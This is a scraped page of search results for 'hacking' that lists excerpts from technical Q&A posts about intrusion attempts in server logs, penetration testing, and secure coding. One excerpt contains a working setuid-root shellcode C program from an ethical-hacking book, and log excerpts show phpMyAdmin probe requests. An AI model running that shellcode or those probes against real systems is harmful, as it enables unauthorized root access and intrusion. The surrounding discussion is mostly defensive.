Search Results

Search found 629 results on 26 pages for 'hacking'.

Page 1/26 | 1 2 3 4 5 6 7 8 9 10 11 12  | Next Page >

  • Software Life-cycle of Hacking

    - by David Kaczynski
    At my local university, there is a small student computing club of about 20 students. The club has several small teams with specific areas of focus, such as mobile development, robotics, game development, and hacking / security. I am introducing some basic agile development concepts to a couple of the teams, such as user stories, estimating complexity of tasks, and continuous integration for version control and automated builds/testing. I am familiar with some basic development life-cycles, such as waterfall, spiral, RUP, agile, etc., but I am wondering if there is such a thing as a software development life-cycle for hacking / breaching security. Surely, hackers are writing computer code, but what is the life-cycle of that code? I don't think that they would be too concerned with maintenance, as once the breach has been found and patched, the code that exploited that breach is useless. I imagine the life-cycle would be something like: Find gap in security Exploit gap in security Procure payload Utilize payload I propose the following questions: What kind of formal definitions (if any) are there for the development life-cycle of software when the purpose of the product is to breach security?

    Read the article

  • Are these hacking attempts or something less sinister?

    - by Darkcat Studios
    I just had a look through our web server error logs, and Terminal services is reporting: "Remote session from client name a exceeded the maximum allowed failed logon attempts. The session was forcibly terminated." Hundreds of times, every 10.5 seconds or so for a period of about 5-10 minutes, once at 2pm yesterday and once again at about 1am this morning. We CURRENTLY have RDP open to the outside, as I am just completing the setup and now and then I/Others need to jump on from an outside office/location (VPN isn't an option) As these are so regular, am I right in assuming that they may be the result of some sort of dictionary attack? or could something like an internal admin's hung session cause such a mass of events? (Win Server 2008 R2)

    Read the article

  • (200 ok) ACCEPTED - Is this a hacking attempt?

    - by Byran
    I assume this is some type of hacking attempt. I've try to Google it but all I get are sites that look like they have been exploited already. I'm seeing requests to one of my pages that looks like this. /listMessages.asp?page=8&catid=5+%28200+ok%29+ACCEPTED The '(200 ok) ACCEPTED' is what is odd. But it does not appear to do anything. I'm running on IIS 5 and ASP 3.0. Is this "hack" meant for some other type of web server?

    Read the article

  • Hacking prevention, forensics, auditing and counter measures.

    - by tmow
    Recently (but it is also a recurrent question) we saw 3 interesting threads about hacking and security: My server's been hacked EMERGENCY. Finding how a hacked server was hacked File permissions question The last one isn't directly related, but it highlights how easy it is to mess up with a web server administration. As there are several things, that can be done, before something bad happens, I'd like to have your suggestions in terms of good practices to limit backside effects of an attack and how to react in the sad case will happen. It's not just a matter of securing the server and the code but also of auditing, logging and counter measures. Do you have any good practices list or do you prefer to rely on software or on experts that continuously analyze your web server(s) (or nothing at all)? If yes, can you share your list and your ideas/opinions?

    Read the article

  • should i bother to block these- rather lame attempt at hacking my server

    - by The Journeyman geek
    I'm running a LAMP stack, with no phpmyadmin (yes) installed. While poking through my apache server longs i noticed things like. 74.208.75.29 - - [16/Mar/2010:02:53:45 +0800] "POST http://74.208.75.29:6667/ HTTP/1.0" 404 481 "-" "-" 74.208.75.29 - - [16/Mar/2010:02:53:45 +0800] "CONNECT 74.208.75.29:6667 HTTP/1.0" 405 547 "-" "-" 66.184.178.58 - - [16/Mar/2010:13:27:59 +0800] "GET / HTTP/1.1" 200 1170 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)" 200.78.247.148 - - [16/Mar/2010:15:26:05 +0800] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 506 "-" "-" 206.47.160.224 - - [16/Mar/2010:17:27:57 +0800] "GET / HTTP/1.1" 200 1170 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)" 190.220.14.195 - - [17/Mar/2010:01:28:02 +0800] "GET //phpmyadmin/config/config.inc.php?p=phpinfo(); HTTP/1.1" 404 480 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 190.220.14.195 - - [17/Mar/2010:01:28:03 +0800] "GET //pma/config/config.inc.php?p=phpinfo(); HTTP/1.1" 404 476 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 190.220.14.195 - - [17/Mar/2010:01:28:04 +0800] "GET //admin/config/config.inc.php?p=phpinfo(); HTTP/1.1" 404 478 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 190.220.14.195 - - [17/Mar/2010:01:28:05 +0800] "GET //dbadmin/config/config.inc.php?p=phpinfo(); HTTP/1.1" 404 479 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 190.220.14.195 - - [17/Mar/2010:01:28:05 +0800] "GET //mysql/config/config.inc.php?p=phpinfo(); HTTP/1.1" 404 479 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 190.220.14.195 - - [17/Mar/2010:01:28:06 +0800] "GET //php-my-admin/config/config.inc.php?p=phpinfo(); HTTP/1.1" 404 482 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" What exactly is happening? is it a really lame attempt at hacking in? Should i bother blocking the ip addresses these are from, or just leave it?

    Read the article

  • Handle URI hacking gracefully in ASP.NET

    - by asbjornu
    I've written an application that handles most exceptions gracefully, with the page's design intact and a pretty error message. My application catches them all in the Page_Error event and there adds the exception to HttpContext.Curent.Context.Items and then does a Server.Transfer to an Error.aspx page. I find this to be the only viable solution in ASP.NET as there seems to be no other way to do it in a centralized and generic manner. I also handle the Application_Error and there I do some inspection on the exception that occurred to find out if I can handle it gracefully or not. Exceptions I've found I can handle gracefully are such that are thrown after someone hacking the URI to contain characters the .NET framework considers dangerous or basically just illegal at the file system level. Such URIs can look like e.g.: http://exmample.com/"illegal" http://example.com/illegal"/ http://example.com/illegal / (notice the space before the slash at the end of the last URI). I'd like these URIs to respond with a "404 Not Found" and a friendly message as well as not causing any error report to be sent to avoid DDOS attack vectors and such. I have, however, not found an elegant way to catch these types of errors. What I do now is inspect the exception.TargetSite.Name property, and if it's equal to CheckInvalidPathChars, ValidatePath or CheckSuspiciousPhysicalPath, I consider it a "path validation exception" and respond with a 404. This seems like a hack, though. First, the list of method names is probably not complete in any way and second, there's the possibility that these method names gets replaced or renamed down the line which will cause my code to break. Does anyone have an idea how I can handle this less hard-coded and much more future-proof way? PS: I'm using System.Web.Routing in my application to have clean and sensible URIs, if that is of any importance to any given solution.

    Read the article

  • I have this code .... Ethical Hacking

    - by kmitnick
    hello folks, I am following this EBook about Ethical Hacking, and I reached the Linux Exploit Chapter, this is the code with Aleph's 1 code. //shellcode.c char shellcode[] = //setuid(0) & Aleph1's famous shellcode, see ref. "\x31\xc0\x31\xdb\xb0\x17\xcd\x80" //setuid(0) first "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; int main() { //main function int *ret; //ret pointer for manipulating saved return. ret = (int *)&ret + 2; //setret to point to the saved return //value on the stack. (*ret) = (int)shellcode; //change the saved return value to the //address of the shellcode, so it executes. } I give this the super user privileges, with chmod u+s shellcode as a super user, then go back to normal user with su - normal_user but when I run ./shellcode I should be a root user but instead I still be normal_user so any help?? btw I am working on BT4-Final, I turned off the ASLR, and running BT4 in VMWare...

    Read the article

  • Is it worth hiring a hacker to perform some penetration testing on my servers ?

    - by Brann
    I'm working in a small IT company with paranoid clients, so security has always been an important consideration to us ; In the past, we've already mandated two penetration testing from independent companies specialized in this area (Dionach and GSS). We've also ran some automated penetration tests using Nessus. Those two auditors were given a lot of insider information, and found almost nothing* ... While it feels comfortable to think our system is perfectly sure (and it was surely comfortable to show those reports to our clients when they performed their due diligence work), I've got a hard time believing that we've achieved a perfectly sure system, especially considering that we have no security specialist in our company (Security has always been a concern, and we're completely paranoid, which helps, but that's far as it goes!) If hackers can hack into companies that probably employ at least a few people whose sole task is to ensure their data stays private, surely they could hack into our small business, right ? Does someone have any experience in hiring an "ethical hacker"? How to find one? How much would it cost? *The only recommendation they made us was to upgrade our remote desktop protocols on two windows servers, which they were able to access because we gave them the correct non-standard port and whitelisted their IP

    Read the article

  • Hacking your own application

    - by instigator
    I am a web developer that is very conscious of security and try and make my web applications as secure as possible. How ever I have started writing my own windows applications in C# and when it comes testing the security of my C# application, I am really only a novice. Just wondering if anyone has any good tutorials/readme's on how to hack your own windows application and writing secure code.

    Read the article

  • piece of php code for prevent hacking.

    - by artmania
    Hi friends, I have a php file at my site, and I connect to db, get some records and list them in same file. mysql_connect("localhost", "blabla", "blabla") or die(mysql_error()); mysql_select_db("blabla") or die(mysql_error()); $blabla1 = mysql_query("SELECT * FROM gallery WHERE id_cat=1"); $blabla2 = mysql_query("SELECT * FROM gallery WHERE id_cat=2"); $blabla3 = mysql_query("SELECT * FROM gallery WHERE id_cat=3"); So, is there anything I need to do for security? :/ like sql-injection or anything else. there is nothing going to url. it is just www.blabla.com/gallery.php appreciate advises!!! thanks a lot!

    Read the article

  • Les développeurs amateurs se mettent aux hacking avec la prolifération des kits de piratage « tout-e

    Mise à jour du 29/04/10 Les développeurs amateurs se mettent aux hacking Avec la prolifération des kits de piratage « tout en un », mais ils restent très professionnels Les kits de hacking « do-it-yourself » (en vf « faîtes le vous même ») se propageraient à grande vitesse. Ces solutions « tout en un » facilitent en effet la création et l'utilisation de malwares (un constat également fait par Microsoft dans son rapport semestriel de sécurité - lire ci-avant). Leurs prix relativement bas aura fait le reste pour leur démocratisation auprès de tous les développeurs malveillants, y compris les moins doués. Dans son étude, M8...

    Read the article

  • Mythbusters- Programming/hacking myths [closed]

    - by stephen776
    Hey guys. I am a big fan of the Discovery show Mythbusters, as Im sure some of you are as well. I have always wanted them to do an episode on programming/hacking. They get a lot of their show ideas from fans so I though we could compile a list of possible myths to bust. Lets hear your ideas! (sorry if this is not appropriate, close if necessary) Edit: I am not necessarily looking for subjective "This is what I want to see" answers. I am talking more along the lines of interesting computer/programming/hacking stories that would appeal to a general audience. I do not expect them to do a show on "Whats faster i++ or i + 1".

    Read the article

  • [Livre]:Chaînes d'exploits: Scénarios de hacking avancé et prévention, de A.Whitaker, K.Evans, J.Vot

    Bonjour La rédaction de DVP a lu pour vous l'ouvrage suivant: Chaînes d'exploits: Scénarios de hacking avancé et prévention de Andrew Whitaker, Keatron Evans, Jack Voth paru aux Editions PEARSON [IMG]http://images-eu.amazon.com/images/P/274402371X.08.LZZZZZZZ.jpg[/IMG] Citation: Un pirate informatique s'appuie rarement sur une unique attaque, mais utilise plutôt des chaînes d'exploits, qui impliquent plusie...

    Read the article

  • Pwn2Own 2011 : Safari vaincu en 5 secondes lors du concours de hacking, Internet Explorer 8 exploité

    Pwn2Own 2011 : Safari vaincu en 5 secondes, Internet Explorer 8 exploité La célèbre compétition de hacking Pwn2Own, qui se déroule une fois par an à Vancouver, a commencé hier. Et à l'occasion de cette première journée, deux navigateurs ont été franchement asticotés. Les spécialistes de la sécurité informatique qui participent au concours devaient choisir chacun un browser à malmener. Et ces derneirs...ont délaissé Firefox, qui n'a été choisi par personne ! Puis, un seul a décidé de s'occuper de Chrome, mais il ne s'est jamais présenté. Les autres concurrents se sont quant à eux concentrés sur Internet Explorer et Safari. Et le logiciel d'Apple n'aura pas résisté très longtemps. Ainsi, en cette première journée, Safa...

    Read the article

  • Using terminal in hacking way (Xubuntu 10.04)

    - by user1163511
    I am beginner in using terminal in Linux. I have some questions about it. First of all, I want to ask you question out of the issue-What is the name of th Terminal in Xubuntu 10.04(for example- bash or anything like this)? My main question is - Is there any way of using the terminal for hacking (e.g. port scanning, whois, gaining root account and take a look of the file system of the server or another things). I will be very pleased to get answers. Thank you for patience and tolerance!

    Read the article

  • Kinect Hacking at Microsoft Developer Days 2012 Bulgaria

    - by Szymon Kobalczyk
    Last week I had a pleasure to speak at the Microsoft’s Developer Days 2012 in Sophia, Bulgaria. It was a great conference and I met lots of cool people there. I did a session about Kinect Hacking. My goal was to give a good understanding of Kinect inner workings, how it can be used to develop Windows applications. Later I showed examples of interesting projects utilizing the full potential the Kinect sensor. Below you can find my slides and source code of one of the demos (the one where “Szymon went to the Moon”). But I wasn’t the only one to talk about Kinect. On the 2nd day Rob Miles also did a fun session titled “Kinect Mayhem: Psychedelic Ghost Cameras, Virtual Mallets, a Kiss Detector and a Head Tapping Game” (you can watch recording of this session from TechDays Netherlands on Channel9). Later that day Yishai Galatzer made a big surprise during his session about Extending WebMatrix, and showed a plugin enabling to take control of WebMatrix with Kinect gestures. Best thing was that he wrote it during the conference, with no previous experience with Kinect SDK (I might helped him a bit to get started). Thanks for the invitation and I hope to see you soon!

    Read the article

  • Day 3 - XNA: Hacking around with images

    - by dapostolov
    Yay! Today I'm going to get into some code! My mind has been on this all day! I find it amusing how I practice, daily, to be "in the moment" or "present" and the excitement and anticipation of this project seems to snatch it away from me frequently. WELL!!! (Shakes Excitedly) Let's do this =)! Let's code! For these next few days it is my intention to better understand image rendering using XNA; after said prototypes are complete I should (fingers crossed) be able to dive into my game code using the design document I hammered out the other night. On a personal note, I think the toughest thing right now is finding the time to do this project. Each night, after my little ones go to bed I can only really afford a couple hours of work on this project. However, I hope to utilise this time as best as I can because this is the first time in a while I've found a project that I've been passionate about. A friend recently asked me if I intend to go 3D or extend the game design. Yes. For now I'm keeping it simple. Lastly, just as a note, as I was doing some further research into image rendering this morning I came across some other XNA content and lessons learned. I believe this content could have probably been posted in the first couple of posts, however, I will share the new content as I learn it at the end of each day. Maybe I'll take some time later to fix the posts but for now Installation and Deployment - Lessons Learned I had installed the XNA studio  (Day 1) and the site instructions were pretty easy to follow. However, I had a small difficulty with my development environment. You see, I run a virtual desktop development environment. Even though I was able to code and compile all the tutorials the game failed to run...because I lacked a 3D capable card; it was not detected on the virtual box... First Lesson: The XNA runtime needs to "see" the 3D card! No sweat, Il copied the files over to my parent box and executed the program. ERROR. Hmm... Second Lesson (which I should have probably known but I let the excitement get the better of me): you need the XNA runtime on the client PC to run the game, oh, and don't forget the .Net Runtime! Sprite, it ain't just a Soft Drink... With these prototypes I intend to understand and perform the following tasks. learn game development terminology how to place and position (rotate) a static image on the screen how to layer static images on the screen understand image scaling can we reuse images? understand how framerate is handled in XNA how to display text , basic shapes, and colors on the screen how to interact with an image (collision of user input?) how to animate an image and understand basic animation techniques how to detect colliding images or screen edges how to manipulate the image, lets say colors, stretching how to focus on a segment of an image...like only displaying a frame on a film reel what's the best way to manage images (compression, storage, location, prevent artwork theft, etc.) Well, let's start with this "prototype" task list for now...Today, let's get an image on the screen and maybe I can mark a few of the tasks as completed... C# Prototype1 New Visual Studio Project Select the XNA Game Studio 3.1 Project Type Select the Windows Game 3.1 Template Type Prototype1 in the Name textbox provided Press OK. At this point code has auto-magically been created. Feel free to press the F5 key to run your first XNA program. You should have a blue screen infront of you. Without getting into the nitty gritty right, the code that was generated basically creates some basic code to clear the window content with the lovely CornFlowerBlue color. Something to notice, when you move your mouse into the window...nothing. ooooo spoooky. Let's put an image on that screen! Step A - Get an Image into the solution Under "Content" in your Solution Explorer, right click and add a new folder and name it "Sprites". Copy a small image in there; I copied a "Royalty Free" wizard hat from a quick google search and named it wizards_hat.jpg (rightfully so!) Step B - Add the sprite and position fields Now, open/edit  Game1.cs Locate the following line:  SpriteBatch spriteBatch; Under this line type the following:         SpriteBatch spriteBatch; // the line you are looking for...         Texture2D sprite;         Vector2 position; Step C - Load the image asset Locate the "Load Content" Method and duplicate the following:             protected override void LoadContent()         {             spriteBatch = new SpriteBatch(GraphicsDevice);             // your image name goes here...             sprite = Content.Load<Texture2D>("Sprites\\wizards_hat");             position = new Vector2(200, 100);             base.LoadContent();         } Step D - Draw the image Locate the "Draw" Method and duplicate the following:        protected override void Draw(GameTime gameTime)         {             GraphicsDevice.Clear(Color.CornflowerBlue);             spriteBatch.Begin(SpriteBlendMode.AlphaBlend);             spriteBatch.Draw(sprite, position, Color.White);             spriteBatch.End();             base.Draw(gameTime);         }  Step E - Compile and Run Engage! (F5) - Debug! Your image should now display on a cornflowerblue window about 200 pixels from the left and 100 pixels from the top. Awesome! =) Pretty cool how we only coded a few lines to display an image, but believe me, there is plenty going on behind the scenes. However, for now, I'm going to call it a night here. Blogging all this progress certainly takes time... However, tomorrow night I'm going to detail what we just did, plus start checking off points on that list! I'm wondering right now if I should add pictures / code to this post...let me know if you want them =) Best Regards, D.

    Read the article

  • What are unique aspects of a software Lifecycle of an attack/tool on a software vulnerability?

    - by David Kaczynski
    At my local university, there is a small student computing club of about 20 students. The club has several small teams with specific areas of focus, such as mobile development, robotics, game development, and hacking / security. I am introducing some basic agile development concepts to a couple of the teams, such as user stories, estimating complexity of tasks, and continuous integration for version control and automated builds/testing. I am familiar with some basic development life-cycles, such as waterfall, spiral, RUP, agile, etc., but I am wondering if there is such a thing as a software development life-cycle for hacking / breaching security. Surely, hackers are writing computer code, but what is the life-cycle of that code? I don't think that they would be too concerned with maintenance, as once the breach has been found and patched, the code that exploited that breach is useless. I imagine the life-cycle would be something like: Find gap in security Exploit gap in security Procure payload Utilize payload What kind of differences (if any) are there for the development life-cycle of software when the purpose of the product is to breach security?

    Read the article

1 2 3 4 5 6 7 8 9 10 11 12  | Next Page >